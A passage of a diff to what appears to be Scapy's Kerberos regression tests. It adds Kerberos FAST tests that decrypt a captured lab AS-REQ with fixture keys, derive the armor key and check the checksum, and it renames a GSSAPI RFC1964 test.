P\xe6X\x04\xe9@\x89\x90\x8cP\xc5b\xf82\t+\x14+\xb7\xa3\xfa\xba\xa4*r\xb41i\x070!\xba\xc8\xb17\x06\x12\xf2\xce\xa0\t9P\xd9]\xe4p1i\xf3\xed\xc0oT\'\x99\xc0\x7f\xa8s\x0bW\xc7S\x90w\xe6\xa7\x91\xe1\x84\xd3V5$\x92\xa3\x81\x90\x02\xdfVu\xd7\xb7x\x13+p\x8djP\xfa\x0eL\xc5}=\x12t\xc3\xa6\xa5\x12\xd9H+w\xea\t\x92km\xf9$\x0c\xa0Y\xda\xea\x15\xd0\xa1\xbe\x85\xa3\xd3\x9fQ\x1a\xd8A\xabf\x9d\x9c \x19\xa5\x8e\t\xb4\xcc@\xf6_\xdd\x85\xb9\\\x9f\xf5P\'\x9ae\xf0\x925\x884W\xde\x9fn\xb3q.\x08e\xd4\t\xf2;\xb5\xd0\xcb\xe8\x1b\x9e\x15\x83~ q]\xdaw\xd2X\xac\t=aV\xa7\x9c\xfb\xee\xe2n\xf7\x9a\xf1\'t[\xe2\xcc\xaeL\xb9\xe1\xbc\x87C\xddG-\xdeJ\x9d\x8d\xa4\xb4W\x83\xb8\xf0(\xa4\x92\xf9\xa9OJ\xb2s\x07\xfa*\x0f\xf9\xbf\x17Z\x15\xd5\x867\xe3\xfd\xa6r\xb3\x9f\xca\xb5\x9dth\n\xc4\xe3\xc4P\x08\xfe\xd6Fd=R\xde\xe6\x80CC,\xe9l=\x89,\x82\xed\xc5<\xec \x8b\x19\xe1\x88\xaf\xf2\x8b\xbby\x8f\xf1\x88\x84?\xcc\xa4\xb5\x7f\x84\x99\x9d\x85\xedEs\xfc\xc6f\xfc\xb8\x04=\xa5\xcf\x0f3\xb3\xed\'\x01\xa2(\xb5\xec\x1d9\xcd\x88%\x86\xf4u\x91\x11\xe6O\xfc:I7\x1b\xd4\xc0\x11u\x80\x1dt\xc1\x81\xd5#\x10\xff4\x03Fs;O^\x0c\xfb9v\xcb\rt\xd2\xfb\xa3-\x01\\\xa4\xd2\x07\xcdm\xe4*\x85)A\xf6[\xf7\xbbOarb\x0f\xd8\xbaq2LL%0\x1c\xc5\xfa\x94L-M\xab\x90<\xb1\x0e`\x81%\xc3\x1b\xe9\x80\n\xf2\x89}t\x07\xe6\x9e\x02\x80\x998@\xd6G>\x88\x18\x0e\xdb\xc329\x7fD~\xbe\xac\xc1\xd9\x05z\x8aP\x175\xad\xf90\x13\xaa\x13/=|\xf6T\xb9\xf5f\x95\xe1?\xaf\xca\xbfq\\^\xa2\t\xe9G\x81\xbd\x01\'\x9a\xed\xe4\x87\xee\xee\xd1\xaa\xd4\x1b\xd45\xa9\xb1\x14\xc4\x98)0\xde9/\xfe{~/\xd3\x05:|\xd4\x9d~\xde\xce\x8a\xd8\x80\xad\xc6\x19\xddzk\\\xb8$\xafY/\x90\xd3*L\xf7\xf5V\xd3\xa7E\x86\xf1Y=\x81\xfd\xcd\xa6n\xd3\xe4\xa362\xb6\xed\xa5\x8e\xa4\xb3\x0eC\xee^i^_\xaa\xf8\xc1\x93f\x7f\xb1\xdcr\xd8\xcc\x9bV\x17\xec\x14W\x0e\xbcUPw\x02"/L\xbc\x1b\xdb\x8c\x91G\xae\xfaI\xfbY\x8f\x9d\xa1\xab\xf0)\xb0J\x9b#\xc4a\xccw\xc9\xc3\x89A3\x9b\xcc\x87\xccx\xb2\x8c\xa4\xb4\xe6c\xc9\xd3Y:\x1d\xc8=\xd8K\x8bn\xe7\xf6\xa3\xf2\xc7\xe1\xffm\x14\xf1m\x80\xb91\x81`&\xc5\xab#Q+r\x14\xb4\xa6!tI\x8aNS\x179r9\x8b\x95\xbe\xf8\r\xd0P\x1f\x06\xe7\xd7V\xe3\x06\x98\xec\xa1\xeby\xe6cm\x88\xd3\xd6<\x1c\xea\x12%\xb5\x1b\x9b\r\xe6\xb4\xfba\x04\x81\xa2\xd1W-x\xe9\xb9\xc5e`\xf1\xcd\x9e\x83Z\x10\xeb-[\xa0\x95\xe1]\xf2)\x0f+{fW6C\x19$\xddd\x8a\n\xa4^\xbe\xf6\n\xe9\x1eI\x1fD\xf5\xdc9O\xe95!\xd9p\x87\x06\xbbgCh\x10\xebjI\xc9\x13n\x8e\xa0\x1bU\xf3./\xb1xU\xab\x1e\xe1\r\xcd\x8d\xa4Od\x14~R\x83\xe4F5r\xbb\xd8-{=\xb5\x9f<\x1er\xe7v\xf7&8\xdfD\x9f\xab/B\xcf\x0e\x87\xf4\xc9G\x8c\x1e\xf77Bem\x96D)!t\x1af\xbe\x84\x91\xe2\x10\x0bmb\xee\xa7%3\x95\xf6\xdc\xcd\xfc\xfd\x00S\xe3\xa13\xbc\xa33m\xfe\xa4\x91\xc7\xaeG%\\\x87)\xdc\xd2=\xef$\xb5\x8ew\x13\xba\xa2\xc0\xfc\xaal,!>\x17>\xd0D\xf7un\x8cI\x98D\x056@\x88y@"\x05T\xec\xd5a\xe66\x1d)\xf2\x80 \xf5&o\xa5\xda\xcd\xde_\x86-\x00\xcb\x02\xfa\xc7\t\x05\xfcX"\x9d\xb8\xbbSe=\xdey\x0e\xbb@\x00\xba\x9bpb\xbd\x98\xe1\x9az\xa9\xdd\xdd\xd5\x00B\xecu\xb0\x08\xf8\xbb\x0f\xf7z\xfb\xd8j\x14\xe9i]\xced\x00\xf7\xdb\x01\xe2\x03\xda\xf2\xbf)-\xad*,\x05\xd7\x11\xbc\xfc,[\x0f\xcb\x8b#\xfdt\x04A\x11\xfb\x95\xe5\xd1\x1e\xbf\x81\x16t\xa4\x81,\r\xb6\x02\x17\xcd\xa1t\xb4MX.\xbd\xcabFn\x0c\xa6\xb8g@\x0f\x14g~_"\xb9\xe9\x8cu\x94\xcc\x8dX~V\xacv\x86v\x98\t\x8d\xbc\xfe\x80\xee\x1c%\xcdJMj\x18\x90\xcf\t\xb4\x8d\rw\x1eK\xfd\xb3n\x0f\xf8|9/\x04\xd2\tIC\x8f\xfe%\xef;\x86\xb2Sm\x7f\x8f\x87\xb2\xa79(\x1a\x15\xb6\x80G\x81)\x9cg\xe0\x19# \xdd\x11Z)\x8f\x87\xc2s$.\xa89\xeb\xd8\x14\xbb#\x8a\xf0\xbc\xd5\xa9\x00\x10\xf9W[M\xf9\xc37B-.\xd9\x8e]\xfa \xf9\x01\x9b\x1fb\x13h~\x12\x11\x86\xf1\xd0\xcb\x8c>B\xf2\xfe\x82!\x8f\xb2\xa1vi\xf5i\\\xcfD\xcc\xb3\xfe\xda\xdcpin}\xa4t\xc9\x02\xa5\xe4\x1c\x17\xf9\x05H\xdf\x02\xf2\xa3n\xac(*\x9f\xb2\xec\xf0`\xbe\r\xb8\x04\xfd\x0f\x19\xd7&v\xd4\x9dA\xa5l\x01\xc7\xa7\xd8\x97B\x83\xe1\x9bD`v\xb4\xad\xe9\xcc+\xc1J\xa6\xb8\xe0\xc1\xf6\x9e\x8e@\xb3\x00\rc\x9e\x08\xbe\xedq%~"\xa0\x19J\x90\x96a\xb8\xc5\x8c\x012$M\x97K\x14e\x068\xda\x03D\x13On\xff\xd9\x1f\x88\xb6`\xe4K\xda\xed\x9b-\x02w,t\xc8\xd8\x18\xe9f\xfd\xa9\xc4\x82\xc9p\x04\xf9CJ\x18\x9e\x13\x07\xce>(') + +tgsrep = pkt.root.encPart.decrypt(sessionkey) +assert tgsrep.nonce == 0x7a33e06a +assert tgsrep.flags == '01000000100001010000000000000000' +assert tgsrep.renewTill == '20231213110146Z' +assert tgsrep.encryptedPaData[0].padataValue.flags == 0x1f + ++ Kerberos FAST tests + +% Same than in kerberos.rst + += FAST - Parse FAST AS-Req + +pkt = Ether(hex_bytes(b'52540013d0835254003ea3be08004502089636a1400080063ad3c0a87fd2c0a87fc8fecc0058eea93069573b278e50180402897400000000086a6a82086630820862a103020105a20302010aa38207a23082079e3082079aa10402020088a28207900482078ca082078830820784a082064a30820646a003020101a182063d048206396e82063530820631a003020105a10302010ea20703050000000000a38205796182057530820571a003020105a10c1b0a444f4d312e4c4f43414ca21f301da003020102a11630141b066b72627467741b0a444f4d312e4c4f43414ca382053930820535a003020112a103020102a282052704820523acc8b7671c0d50522f1a8d8452ce450aceb40fff0229e8ee546bccf1512e4877ef93dde465595260a6a5a8e85ea38600ce8dff7d510f3c744e2c43eb9d3187d638f716c29b6e7aa9eb407de28d0161f49013966eda0a161ff174dad42e7aa500cfe298541215448013ffe4883b6b1166f908f50de129487fe77fff874fd4102cdcce8db8dbeb8da02f08cc88b3790cdad5ec499959c7e79d6fef107d1e17ce80cc3df050b7e7a1c31f278e4fd4ea9523c950876f174be363234f8495b9550de1560ba17daeafbf133f78991053d929ad3fd668327d42288e6581671daaef908682ee282e17c31d8f8bb55d27fce155ee2e84a2ff8bc9600891be15e6ede3e1bbd2742a7af8b0a32c48973c9e3776a69647bab11592756c5a15b9101c392efa35d000abb3dabccd97e64426e3fd8d47e0e369c83b5391f38947d536d351c061081d654eef1a3861cdb2ea2bc48222b450d1b7d09c0670493bccc60dfcaa5cfe46fd50adf8e388204a4691dc5f0c3dbae0b4da6ac2dd781f149a444840aaa3a3c3befb5a5c04ee0405baed66afcf9b988d10ea14a955f43df79465e6fc02a12bce3870988950f1ab48e1a4f876f351671c5061e6399a63cb0479f7bd017dfd9bc5be192faf6d4f11e6ee6003933eeaf632f0056c4c1ccd183d7977cfca85419fe5b039674419d802068e792c9576ae2a88bfbeb1f59273226782c6efb288717d8f7a4bc3bf4c697fcac1adc1829f0a914f2559b278ccadd108eb87a11dacc88e4302e9af627474e57171192b94c6b358f8f98e308596215d2fb9d9c2b49c4cbedcb43fc231b86f0493d56b82962cf3383a84f8922c2b99f8fa8fdd85797b09a6e60f72007c0379988be2ff1cfc16f21300c1b4b784174005a9185f760e68ef94b9384eb24decee31b63d1b92278cd75b85d4d80c4e83306533a9d95aa6207cbfbeb0970a41c44aba59839f007923ecd8ff0de8314990a435dbea4dedbee16faf5ab2be9f96d691cfa983a6c843bd183f84c1b4998a3eaa907cae6b82b0ae8363f3edd8cb03d3c9c60ff55a84d8a292ea20555fbd6ce5ad4ad7a6b4bc5bff2e02c477a7a8a98d5a387d389caa172c400b151d95871b2aa16a040dc71a9be5f0774b06a5ca87674ccb4109a2c41db9e3160704218ad495d0751194fbef4becae4d7be24b9d968da592256a2b22cf724e989e71a60d0603b59bebd475285f793794b7a18af49a2b68670e3a6247c453274e35c863a16b5023c6c94659e25abb27c760f989ac0bbf9a5b125d0ea34fb03225cc93d5b8b6829e906883ee76cf8ee61dfacc488e8dc5cbc8ba9705a9e915a68f838232394f97fb1aac4a2a90fe17d46f9c51946a2bf9598df7f5b5e7ee692a78860eea3cef748a5be36529228e40b4aec83ebc8bb14176a4c565b06500e9517229b8340c55812101dbbc6bee693c35873082a5a1a53b35cf3509193d4dc5175c9360a00da71692ba205b3264aecc9ecc8bca31fec43efc8701423bb484f6f21699439dd30f71228f16eaab96b7de3547721d1635bbfe50678900ac378a4958b6c34964f3e0dc843880dbde57fb4a76ab85eba2b190bfdaefc7ba17e109f839493b0f2d6fc7ea17403bebe06f2809314ca514606f54668082364ed6752019f27e1df74f93fcf1c25630a29713a89d4a998c444bc91279c6fc66e0aa5dec72be316e1160cf9f90d5915c464b6bfec5216e901be4726db596a15745511c63736a69ac9ecb9e86601c631b4992653c320e6983562fa613134560cb606621e9661ac5961313ee70868ab48d6010173d8a96fffdb2baf4afe18c846d3fed6f30b9a809d72e647735fc536edec543abc232480d28660395a4819e30819ba003020112a281930481901273d5af61ad426d51d0757e897917caeb6fc1b6950554e8d750f95d27f444e3aaf7ae0bf4595b5e906d9682dbdeedcf6eb42a84ab8092997b783f57710127228165deeb2ce5e09e2ddc71555dc31970a8312d888b8ae766382098276d62b4bd76f34cbc889e24ad5405ec037ceb724fdb71fe247fe2a414a037ed33c796f4475fcfb5993eed147b6d63d740d58da5b0a1173015a003020110a10e040c75f02d8d2954e0ae1a9e0653a282011930820115a003020112a282010c04820108ae9bbc4629c80f4a383a69c4583824295c75f34b000b3fdbdaab073a042935e32c29e0ee2b2b446e4a6a2592362d0d593cddd74dacc24f16353776e1b5d192ad1cf5e63f66f40a134ecb87c077c30922bc0cab00ae23d187d56090d9098f843c54fabe7c012ff87e317dfe339c40911264609d489b041a4e9b52c0eb03ee88a393d17da92786bd1716b92eb0d7a5a24a64ade0870dea8a7e138acdf209ee277cb3fadeedab173fd64cc10a1004010774658b94852639bda10a5e8aff29174e3d2c7032c32631b074afdac0e6832bae74de9be19e522f63bc8499753a209291fee1861c29096cc8ee3cfda5be235b0aa95635916edcfcdaf90b896e2eaa5a57d5e4da0b00408f4201a481af3081aca00703050040810010a11a3018a003020101a111300f1b0d61646d2d302d66617374656e62a2061b04444f4d31a3193017a003020102a110300e1b066b72627467741b04444f4d31a511180f32303337303931333032343830355aa611180f32303337303931333032343830355aa70602043f58a7a0a81530130201120201110201170201180202ff79020103a91d301b3019a003020114a112041053525620202020202020202020202020')) + +fastreq = pkt.root.padata[0].padataValue + +assert isinstance(fastreq, PA_FX_FAST_REQUEST) + += FAST - Decrypt fast ticket in AS-REQ + +from scapy.libs.rfc3961 import Key, EncryptionType +krbtgt_hex = "ac67a63d7155791fe31dace230ab516e818c453dfdbd44cbe691b240725c4907" +krbtgt = Key(EncryptionType.AES256_CTS_HMAC_SHA1_96, key=hex_bytes(krbtgt_hex)) + +enc = fastreq.armoredData.armor.armorValue.ticket.encPart +encticketpart = enc.decrypt(krbtgt) +assert encticketpart.authtime == '20220712230225Z' +assert encticketpart.cname.nameString[0] == b"SRV$" + += FAST - Decrypt authenticator in AS-REQ + +ticket_session_key = encticketpart.key.toKey() +assert ticket_session_key.key == b'\xe3\xa2\x0f\x8e\xb2\xe1*\xe0\x7f\x86\xcc\x88\xe6,\x08>B\xd8)m/G\x82B;\x9f+\x86\xcd\xcd\xf4\x05' + +enc = fastreq.armoredData.armor.armorValue.authenticator +authenticator = enc.decrypt(ticket_session_key) + +assert authenticator.crealm == b"DOM1.LOCAL" +assert authenticator.seqNumber == 0 +assert authenticator.ctime == "20220712235437Z" + += FAST - Compute the armor key + +subkey = authenticator.subkey.toKey() +assert subkey.key == b'%\xa4n\xe1\xd0\xf5\x8d\xc4\x8d\xecv\xe8\x9c\xd3\xc9\xee\x1bu\xc9\xa5\xa6\xf8\x83f\x98\xa1\xd9\xe7*I\x9b\xf8' + +from scapy.libs.rfc3961 import KRB_FX_CF2 +armorkey = KRB_FX_CF2(subkey, ticket_session_key, b"subkeyarmor", b"ticketarmor") +assert armorkey.key == b'\x9f\x18L]I\x16\xd0\xe5\xa6\xd9\x92+\xbf\xbc\xe0\n\xd1\xcb6\xf3\xd1.C\xc2\xdcp\xf0H(\x99\x14\x80' + += FAST - Decrypt KDC REQ BODY from AS-REQ + +enc = fastreq.armoredData.encFastReq +krbfastreq = enc.decrypt(armorkey) + +assert krbfastreq.padata[0].padataType == 0x80 +assert krbfastreq.padata[0].padataValue.includePac +assert krbfastreq.padata[1].padataValue.options == "10000000000000000000000000000000" +assert krbfastreq.reqBody.cname.nameString[0] == b"adm-0-fastenb" +assert krbfastreq.reqBody.etype == [0x12, 0x11, 0x17, 0x18, -0x87, 0x3] +assert krbfastreq.reqBody.addresses[0].address == b'SRV ' + += FAST - Check Fast Armor checksum + +data = bytes(pkt.root.reqBody) +fastreq.armoredData.reqChecksum.verify(armorkey, data) + + Advanced Kerberos tests -= Use ancient RFC1964 with InitialContext += Test Kerberos InnerToken wrapping (ancient RFC1964) pkt = GSSAPI_BLOB(b'`\x82\n\xc2\x06\x06+\x06\x01\x05\x05\x02\xa0\x82\n\xb60\x82\n\xb2\xa0\r0\x0b\x06\t*\x86H\x82\xf7\x12\x01\x02\x02\xa2\x82\n\x9f\x04\x82\n\x9b`\x82\n\x97\x06\t*\x86H\x86\xf7\x12\x01\x02\x02\x01\x00n\x82\n\x860\x82\n\x82\xa0\x03\x02\x01\x05\xa1\x03\x02\x01\x0e\xa2\x07\x03\x05\x00 \x00\x00\x00\xa3\x82\x03\xf9a\x82\x03\xf50\x82\x03\xf1\xa0\x03\x02\x01\x05\xa1\x13\x1b\x11SAMBA.EXAMPLE.COM\xa2\x1a0\x18\xa0\x03\x02\x01\x01\xa1\x110\x0f\x1b\x04cifs\x1b\x07localdc\xa3\x82\x03\xb70\x82\x03\xb3\xa0\x03\x02\x01\x12\xa1\x03\x02\x01\x01\xa2\x82\x03\xa5\x04\x82\x03\xa1\x8eA^\xd1\xa6!\x0f\x82\xb9\xbe\x82\xd0\xe8\x8c\xd7\x1bs\xb7\xb4&h\xec\xd6]\x0f\xdc\xc30n\x9f\xc2\xbb\xf03\x93\x027\x88_\xd7\x85I\x81\xf1\xba7\xcf \xa4\xf4\xa3\xc5C\x1d\xe8z\x1f\xb7\x97\xb1\x1e\x93\xcc\x1e\xc2\'\x94\xee\xf3v\xael\x95\x9d5x\xde\xcf\xad\x16\x1c=\x0eDbb\x9e\xbaE\xfc\x9d\xddnu\x19\x1c\xa4x\xf0#\xc8\x1fTI:\xfb\x94\xd7#,\x9f\xf8\xca\t\xf5\xdd\xcf\xd4\'qLy\x85\xac#\xcb\xde\xe1\xc1\x02+\xf8\xf4{.\xe6\xd7`)\x9d[\xfd\xb8\xc3+\xcaF\t\xa1\x97\xd4\x8c\xe3.\xa4\x80\xd1v2\xf8\xff\xb7\x89y\x98\x13&\x94\xe4\x95\\\x12l\xd8j)\xa7\xa4^\xed\xa9\xee\x92\xaf\x99a\x18\x08\x96M\x8d\xe2\xed\xf4J\xf9\xa8\xb9L0b6\xfc\xa6\x82\x84\xa5`Z\\\xe3\x8e\xaaW\xffj\x94\x05\x88(D$\x84\x11\xe3f1\xfb@\x05g\x00\xad\xf9\x92\x9a\x92^/\xe5\xd4J\xbd\x1bH\x98\xe4#\xb2\x87S^p\xb30\xe6hdK\x1fpp\xde\xf3\xf8\x1b1C\x9c\x9f^e\xfa\x1e\r%\xf6@\xe1=#\xd6\xbf\x82\x8c\'\xca\xcf\xf1\xda\xaa\xdch\x7f\x99\x8e\xa8{4_\xb6\xc1\x1a\xb2\xd0\x16Pfb"\x0b\xde\x02\xb8)=\xbbF\xdfg\xd3\xa4CGb\xfd\xe3\xc0\xff\x96\x8a)\xd9\xd4d\x15\xaa\x01\xa7\xa6\x8f\x81\xf3\xedl\xeb\x8a@\x86\xf6dv\x17\xc4\xda\x14a\xbb5\x80\x08\xa4BPR\xe3);\xb7I\xd3\x90\xaa\xb5\x02\xcb ?\xd2\xb5T\x9d\xd0Ho`\xb0r\xd9R\x9fI\x05\xf9b\xd9\xa6\xa8\xae2Q\xed\x1f/@\x1b=bC\xc8\x1d\xbb1\t\xc7\xabBNK\xf4\x0f0Q\x13\x8e\'\xf9\x91\n\x90\xa4\x97\x81S\xda7u\x92<\xa7@\xa0LO\xb7\xa5\x88\x0b\xa8\xd8p\xbbs\x97f\x17\x16\x87\xbe\xff\x84\xcf\xbf\xba=n\xd0w\xeb\x99x\x03\n\xb5\'\x0ewQ\x90;\xed~}}\x1a\xaf\xe5\x9d\xc4r\xe8\xa6\x97\x07AYl\xec\x8b\xc8\xf5I#\x0f\x04#\xf1\xf9\xec\xdf=\xd7\xc25\tC\xa2\x00\x0cr\xa7N\xfa\x1d\x18\x0es\x05\xef\x11\x84\xc2}\xee\xecKW\xc3\xaeo\x8eS\xa3\xa2n\xb3\xd3\xf1\xb0\xfc\xd8\xe8\xd7jp\xf7$\x11\xd2\xafZ\x83\';*\x87\xa6\xc2\n\xd9:\x8cy9d8\x1a\xf7B\n\nr\xa9M\xcf\xf5?\xe1\xa0\xdca\xd3\xc9\xdc\xc6\x04KyQ\x7f)g;\xc8s?0\xab\xf7\xd7\xd7\x85\xdd1]\xd2\x12\xb5\x1c\x87\x05/\xf4\xe4\x8ci\xe3+\xdeH"\xc2\xe7Z\x17\xaa \xd2\xbaKr\xcc\xd0\xa9\x1d\xe2u\xab\xcc\xd9\xc0\x05\xc5\xf2\t\xf5\xb1M\xa4\x84\x1fS\xfe\xb1\x18r\x81\xba\xc9\xfe\x8f\x01\x8c\x12\xd2\xa6Jy\n\x98\xe9\xd1\xfa\x89\x9c\x84\xf8\xd5\x7f3\x92\'\xed\xa9\xc3\xc1\xcd\xcd\xb9\x19\xec\xb2\x08\xa2\xd0\xc1@\x80\xf1\xc1\x1b(\\\xd3\x17\x04\xf8\xbf\x1a\xb4>.\xcbzP>R\xe9\x84V\x04\x92\xf3\r\x9a\xd2\x99\xf0q>K\\\xb5f\x8e\x9c\xc2\xb3\x1f\xebL\x19~\xda^\x1dY\n\x9d\xd11B;n\xcc\xd3\x1e\x1d\xe0\xe2o\x14\xd8_\xaf\'f\r\xe1 \xfaD\xaa\xad7\xac\x81\xd2\xfd\xf1-D\xba\xa8*\x07J\xbb4\x1b\x19ny\x81\x113\x0e]\xfa|T\x91ayS\xe8\xf6y\x9d\x8b1\xf5\xbb\\\xfb8JD\x17Fq\xd4\x8aF\x16\x9ed\x1cJ\x864p\x94k\xe2\xdd\xdc\x15\xb7\x0f*\xae\xa3@\xc2\x92\xcd\x17>|\xc8\xb7\xd7\x1ay \x8b\xbdZ\xef3*~S\x81D\x12}$\x0c\xce\xa7`\xcam\x9a4q\xdfK\x0eE\xbe\xbf,\xfe\x8a\xe6\xd0Q\x03\xe2\x19\xefx\xb6`%\xcb/\xfa&\\\x15\xc8\xa3\x83V\x18N\xad\xce|6r\x01tW\xa4\x82\x06n0\x82\x06j\xa0\x03\x02\x01\x12\xa2\x82\x06a\x04\x82\x06]\xbe\x88N^mh#\x18\xc2\xf0\x8e\xda\xe5E\xab\xe8\x811\xd2\x0e\xd2q\x96\xf3\xb6\r\xa2s\xcf\xe70s\x0eF\x1b\x01~\x9ev\xcc\xb0h`5\x11\x8d\xb4f}\xad\xc9\xbeGG\xe4\x1f,\x08\x8f\xde}\xad\x0f\xee\x00\n`j\xb2\x9fy]>\xd3)w)8\xc4\x88\xf3]2ea\xce\xf5.R1\xe5G\x87\xeb\xa8\x0f4\xcf\x13\xe7\x1d\xcd\x16\x00\xe8\xf5\xc4_1\x95\xb6\x16\xa0b*\xf6\x8e\xd2\xd5\x19s\x1b\xce\x86\xd4)R\xa9\x13i"\xe7}\xda\x8d_\x961\xb3\x8b=\xd3R\xa9\xb8c,\xb3\xb7#\xdbt*\x04\x15\xa5\xa8f\x80m\xe8m\x1b\xb2\xe9\x1f\x1f\\\x1a\xbb\x90x{&@\xc3v\xa5#>\xd2\xb7\xd1y\x1f\xf6&wz\x88\xe2\xdd\xdb\xc0\xbfP\xec\xbf\x9a\xff\xf0"\xdf\x9e\xdd\x87\xb4\x06)2\x12\xd7\xad\x99\xf0\x98\xfdB6<\x8d\x1e\xf5\x0c0\x9e+\x19\xa4\x91E\xcet5\xbbz@M\xd8\x18\t\xdd\xaa\x16V\x87Ii\x0f\xe5)P\x0e\xd32\xbfK\x06j\x14\xcc\x8e&TZ\xfa\x89\x87\xe6\xd0\xe5\xe5[`\x97\x13|0s\x1c\x841Y\xbcT\x19\xa1\x8b\xef\x16k\xde\xf6\x0e\x9fPA^\xfe\xa3S\xd9-\xab\xf2{Y#b(\xcb\x13\x1b\xae\xb0h\x91wy\xfd\xff\x01\x13\x92O\xcc<\xf1\x88\xb7\x07\xc5\xe8,\xa3\x8et\xe7\x186FP\xe9?\x862\x881\xd3E\x91\xea\xf0\xa3I\xba\xc1^\xa1\x1b\xce\xeftZn\xb1m\x1ah\xfa\xe8\xf2z\xb8\x11\xa19Z\x13Y{1\x8a\xa4\xc5LRl(\x91\xf7\xcaI7\x13\xf6\xe4\x1c\xb1\xf6!\xe9;/U~\r\x17\xcd5}J\xcd\x18\xe0\xae\x1a\xca\xdb\x99\x02\x13\xbc\x93\xff\xfe\x82\x90&|\xf4\xf2fI\xbb\xfc\x81m\xc0\x94\xcb\x9a\x0f{\xd3\xa2<\x86g N2\xd8\x8f]NA\x0c?\x8d\x80 S\r\xde\xa6\x87\xd4"W\x9c\xa1\x18p\xbf\xc5e(\x06Bc\x1c\x8e<\xf8D\xb8\xd8\x8b\x88_Q\nh\xb6xW\xd7\xc1l\x08t\xce\xc2\n\x06\xb1\x1b\xe1\x16x\xe6\xb9Q \xba\xdfa\x97\xa9\x9c\xf1\xf3N\x97w\xf8\xfd:!\x93\xa6\xc7\xfc\xcd\xf3\x12\x14\xe5\x8dB\x9d\xe2uY{3\xc8bukA\xfa\x95\xa5\xa3\xcc(-\xf6\\\x9f\x14OD\xef\x0f\x8c\xde\xd0B\'<\xd36hT\xbd\xa0\'\x89\x1f\'\x15`\xbb[\xf8Zx\xdc\xcdx0)\xc2\x8dD-\xa9m\xe3\xd7\x91w\x10\x8aD\xd37+\x8b\xf7\xa7\xa2\x8d{\x0c\xd8\x80\xe1<)lg\xb9\xbfr\x95^)^\x0e\xe5*\xbfGk!5/$01z\xf7\xcf\x86\x1aF\xf2V\x12\xa8w\xad\x070\xf3\x10\x86\xd6\x19\r\xdd\x88\xbe\xc4\xef\xbb\xd2\t,\xa2\xcd9\xbd\x11\x03\xed\xc9X\x98_\x00\xf5\xfa\t<\x9d\xfco/\x84\xca:\x1e\xc6A\xb0\x1f\x8d\x07\x18\x11\\WC\r\x7f\\\xa0\xea\'\xcc\x96\xc7\xd8\x9a\xb4-\r\x88\xc8\x12\x1f\x8b`\n#\x9a\x92\xa9\x86\x85z\x0ctB\xff:\xaf\xbc\xd4F\xcf$R\x8a\x81\xbd\x84\xe03F\x95\xa0\xbb\xdc\xd9\x7f\xc9\x91/\xc3\x9c~m\x9d\xbb\xfd\x8a\x80\xa8\x81\xb1VC\xf5y\x13N\xa6\x1dq\x1bn\xa0\x83\xeaQ\xe4-\xe3m\x99\xcf\xe6\xb2n\xe7\x0e\xea*\x01\xb5\xdb\xf5P\x03\x96\x82\x91\xe9\xa7\x9bm\x9c\x98\xe3j\x85UG\xd9\x0f\xb5\xb47\xd18d\x9f~VL\xa6\x98\xf2.\xf3\x821\xc8\x03\\fP\'\xee\x85\xbf\xdbd\xc1\x023\xf9\xb5D\xda\xe6Y\x0b[\x86\x9b\xbd\x96z\xe67\x05\xba\x1f\xfd\x1f\xb2F\xf2P\xbd<\xd7\xbdUj\xb1@O\xa2}\x02C\xc4\x01eu\x7f%b\xb4\xfc\xe1D\x02\x8f\xbfj\xd7~E\xd5^h\xc8\xc3\xf9\xb3\x1e\xf0\xbb\x02\xfb\x8c\xc4\xc2\xa8&xn)\x08^\xc0H\xbc\x19\xb7-a?N=?\x93\x97\xb2Q\xe0\x04`T\x1bS2\xd8\xbc3d\xef?\x1e\xab\xc2\x82\xcc\xa4\xe7\xd9\xe6\xe2\xd3\xe9Q\x83\x11\xf4\xfb\x82\xa4y\x176\xaf\xf4_\xbf\xa196\xb4\x05B\xc7\xb3\xd2\x0c\x8c\x18\x95\xe1\xba\x97=Y|\x19k\x0c\xf2\xb3\x0fAV\xd1\x04\xeffX\xcd*?\x03S\x92\x0b\x85\x00\x99x+sh\x07\xd2zl\xbbUS\xf0A\x1aS\xa1\x1fFRf\xc6\x9b\x8dV\x85\x14kE\xae\xef\x05\x18Nx\t\xc8K\xd2\xfd1\xc2\xb9H\xde:L\xd5h%c\xa5,$b\xf9\xa2\xce\xa6\xe5X\x11\xb9\x12\xe7\xd6\x1d\x1f\x03\x8e\xba\xc8>=\x8f\xca\xdf\x80U\xce\x16\xb50w\xaes\xa9)\xdd\x863f\xad2\xc6t`\xc1>\x9d;7o\xa6\xef\x08}1S\xb3\xf7\xdf\xa6\xa0@\xae=\xa3\xb8H\x89\x0f\xdd\x7f\xed\xa4\x19\xf5\x94\xc91\xb9B\xca"\x93\xc1\x05&\xbd\x8c\x82\xdf;C\xcb\xd4R\xc8>\xde\xd8j@\x81\xb6\xa7r\xe9\xb5\xb2\xe0\r:\x8d+\x89\xe1\xee\xf5Aj\x8d\xfb\xa0\xd8?\x06\x10D\xcc\xa6?@\'\xc06^\xfa^s\xe6\r\x8d\x1e\x9cv\xd6\xce\xda)Q\x7f\x83\xba\xe0\xc7R\x82\xe9\xbf\xb8\x88\x12\xe7\x13\xc4\xc4/\x8f\x1d\xde\x197\xe8\x9aFe:\xc33\x02\xbc\x85q7\xbc\xde#\x1e\xdb\x7f\xf2#\xda\x80IT,\xc5\xe7\xe7)\x1a\xb0\x0e-\xbe\xf8\x14\xee\xa1\x82\x1c\x99j\xe4}\x84\xb4\xcc\x10\x84\xean\xc8\x9f\xe7=a2\xa7\x84\xa1\x87\x00n\xd7\x9b\xd2\xe8c\xc7\x9f\xca\xbd=\xdch*\x1b\x0f\xceH\x81\xf7\xdc\x1a\x93A\xdbJ\xe3\x936\xe3\xff\xfb!\'\xe3\x1b"\xff\xc6\x1b4\x98\xde\xc1%A3\x16\x7f&\xafM\xdfX\xfb\\\x1d\x91Vp\x19\xcd\xd8\xe3$\x13J\x9c\x89\xbc~\x07O\xac?\x0c\xa6\x80yZ\xef0\xef}\x89BA\xe9k\xfa\xf9P\x97\xe5\x14\xd4+/_\xa6\xba\xf9\x04Ph\xe1\x1a\xb5=\xd6nq\xd8\x13L\x03\xd5\x19V\xd9e&\xdfJ\x99\x90\xca\xc7\x84\xfb\x08H\xa6Y\xc0T[\x87\xbeok\xb4\xeb\xca\xdb\x9d\xcf|\xbdn\x9f\xde\xb10\xecnWc\x80\x18\x07\xfb\x1eYb{Q\x0e\x0f\xfc\xcbE\xcct\xfe\xd7\x8a\xb6\x1a\x17\xba\xeb\xfdG\xdbz\xa8\xe89\xb5[\x0e\x83kO\xdc|\x14\x92\xdc3\nc\x05~e1') -assert isinstance(pkt.innerContextToken.token.mechToken.value.root, KRB_InitialContextToken) -assert 